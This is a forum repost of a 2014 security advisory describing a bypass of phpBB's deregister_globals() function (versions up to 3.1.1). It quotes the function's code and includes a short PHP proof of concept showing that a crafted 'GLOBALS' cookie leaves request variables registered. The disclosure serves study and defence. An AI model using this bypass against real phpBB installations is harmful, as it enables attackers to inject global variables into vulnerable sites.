Nytro Posted November 25, 2014 Report Posted November 25, 2014 phpBB <= 3.1.1 deregister_globals() Function BypassphpBB <= 3.1.1 deregister_globals() Function BypassTaoguang Chen <[@chtg](http://github.com/chtg)> - 2014.11.18When PHP's register_globals configuration directive set on, phpBB will call deregister_globals() function, all global variables registered by PHP will be destroyed. But deregister_globals() functions can be bypassed.``` $input = array_merge( array_keys($_GET), array_keys($_POST), array_keys($_COOKIE), array_keys($_SERVER), array_keys($_SESSION), array_keys($_ENV), array_keys($_FILES) ); foreach ($input as $varname) { if (isset($not_unset[$varname])) { if ($varname !== 'GLOBALS' || isset($_GET['GLOBALS']) || isset($_POST['GLOBALS']) || isset($_SERVER['GLOBALS']) || isset($_SESSION['GLOBALS']) || isset($_ENV['GLOBALS']) || isset($_FILES['GLOBALS'])) { exit; } else { $cookie = &$_COOKIE; while (isset($cookie['GLOBALS'])) { if (!is_array($cookie['GLOBALS'])) { break; } .... } } unset($GLOBALS[$varname]); }```In the above code we see, when request $_COOKIE['GLOBALS'] = 1, $GLOBALS['GLOBALS'] will be destroyed by unset(). This means $GLOBALS array will be destroyed. This also means you will not be able to use $GLOBALS['key'] to access or control a global variable in all scopes throughout a script. Because the binding between the $GLOBALS array and the global symbol table has been broken. All global variables registered by PHP form $_COOKIE, $_SERVER, $_SESSION, $_ENV, and $_FILES arrays will be not unregistered.Proof of Concept```$_COOKIE['GLOBALS'] = 1;$_COOKIE['ryat'] = $ryat = 'ryat';deregister_globals();var_dump($GLOBALS);var_dump($ryat);$GLOBALS['ryat'] = 'hi';var_dump($GLOBALS);var_dump($ryat);```P.S. I had reported the issue to the phpBB developers, but they do not consider this a security issue.Sursa: http://80vul.com/phpbb/vul.txt Quote
